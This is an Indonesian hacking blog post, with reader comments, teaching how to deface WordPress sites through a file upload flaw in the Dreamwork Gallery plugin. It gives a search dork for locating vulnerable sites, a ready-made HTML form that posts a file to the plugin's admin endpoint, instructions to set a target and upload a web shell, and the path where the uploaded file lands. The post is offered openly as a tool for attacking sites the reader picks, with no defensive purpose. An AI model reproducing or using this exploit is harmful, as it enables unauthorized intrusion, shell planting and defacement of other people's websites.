Thursday, 6 April 2017

eXploit Dreamwork Gallery File Upload Vulnerability


Hello World; Soree Fans, Please Say Hello Haters ;*
apa Kabs ? Lanjut Blogwalking Om. akwkwa, maap2 lagi sibuk nulis ebook sama nulis SFTH, sembari donlod2 JAV uncensored sih :v #aanjaey xD awkkwa
seduh kopi dulu biar sans kale xD , okei kali ini Gue Bakal Share salah satu eXploit yang ada pada CMS WordPress.
ini merupakan salah satu Bug/Celah yang ada pada CMS berlogo W Biru >..< *suka2aingmhanx*

Yupz kali ini gue bakal Share Tutorial Deface Website BerCMS WordPress dengan eXploit Dreamwork Gallery File Upload Vulnerability .
Gua gak tau persis ye ini eXploit baru atau Lawas, soalnya gua muter2 barat ampe timur gak nemu yg bisa di sodok make Shell :3 udh Bypass ekstensi masih gagal.
kalo mao liat yang berhasil upload Shell cek di Source ya :) , karena utk kali ini gua cuma Upload Script dipesan saja :')

Lanjut intip tutorial


Dork :
inurl:/wp-content/plugins/wp-dreamworkgallery/
(gunakan imajinasi vokepers lu, biar dapet yg vuln n verawan)

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Masukin ke Script Uploader dibawah

3. Copy Script dibawah:

<form action="www.target.c0li/[path]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>

*ganti target.c0li dengan target yg pen lu tusbol
*[path] = sesuaikan dgn target lu, ye kalo gak ada pathnya langsung masukin aja eXploitnya
*save dengan ekstensi .html = contoh.html

4. Masukin Shell/File yang pengen Lu Upload

kek yg tadi gua bilang, gua upload script dipesan langsung

5. nah langsung Muncul deh Letak Shell/File yang tadi udeh lu upload.
tinggal lu cek aja


#BooM~

Shell/File Akses: /wp-content/uploads/dreamwork/randomangka_uploadfolder/big/namafilelu
dah ye, simpel kan ? intinye pinter2 lu Dorking dan eksekusi aja hehhe.
lanjutin deh, lu eXplore dewek nih eXploit & Bug (y) , moga membantu lu ye . ya minimal buat Refrensi aja awkkwaka xD

owh iya, Bila ada Link atau gambar pada Artikel Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Sekian dan semoga bermanfaat .. terimakasih

Source and Thanks to: xhac.kerr

./Nuenomaru


Lo Hebat soal Mencari Celah, tapi Maaf Attitude masih Lemah





Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

6 comments

Minta nama fb #nuenomaru dong :'(
Pengen nanya nanya

kwkwkw boong ah
lalu yang post di fans fage fb siapa :v

itu admin fanspage -_-"
pan admin TCA bukan cuma saya doang mas

#Nuenomaru

Kasian kaga pnya fb.. Mau di buatin :v

Kalo upload shell nya gimana yah?:V


EmoticonEmoticon